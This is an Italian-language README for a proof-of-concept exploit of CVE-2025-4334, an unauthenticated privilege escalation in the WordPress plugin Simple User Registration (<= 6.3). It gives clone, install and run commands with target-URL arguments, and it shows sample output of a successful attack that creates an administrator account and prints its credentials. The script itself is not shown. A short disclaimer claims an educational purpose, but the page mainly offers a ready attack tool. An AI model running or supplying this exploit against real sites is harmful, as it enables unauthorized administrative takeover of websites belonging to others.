
Exploit proof-of-concept per CVE-2025-4334, una vulnerabilità di escalation dei privilegi nel plugin WordPress Simple User Registration (<= 6.3), che consente a utenti non autenticati di creare account amministratore.
Titolo dell'exploit: Simple User Registration <= 6.3 – Escalation dei privilegi non autenticata Autore: Gaurav Bhattacharjee (0xgh057r3c0n) ID CVE: CVE-2025-4334
Questo exploit prende di mira una vulnerabilità nel plugin Simple User Registration per WordPress (<= v6.3), consentendo a attaccanti non autenticati di escalare i privilegi e creare un nuovo account amministratore.
Clona il repository e installa le dipendenze Python richieste:
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt
Dipendenze:
requestscoloramapython3 CVE-2025-4334.py -u <base_url> --form <form_url>
Argomenti:
-u / --url → URL base di WordPress (es. https://target.com/wordpress/)--form → URL completo del modulo di registrazione (es. https://target.com/wpr/default-registration/)Esempio:
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/
[*] Fetching form details...
[i] Extracted Nonce : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response : {"success":true,"user_id":2}
[+] Exploitation Successful
[+] Username : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name : 0xgh057r3c0nadmin
[+] Email : [email protected]
[+] Password : Wiz007@8876@
[+] Role : administrator
Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)
Questo strumento è fornito solo per scopi educativi e di ricerca. L'uso non autorizzato contro sistemi senza permesso è illegale. L'autore non si assume alcuna responsabilità per un uso improprio.
Questo progetto è concesso in licenza secondo la Licenza MIT.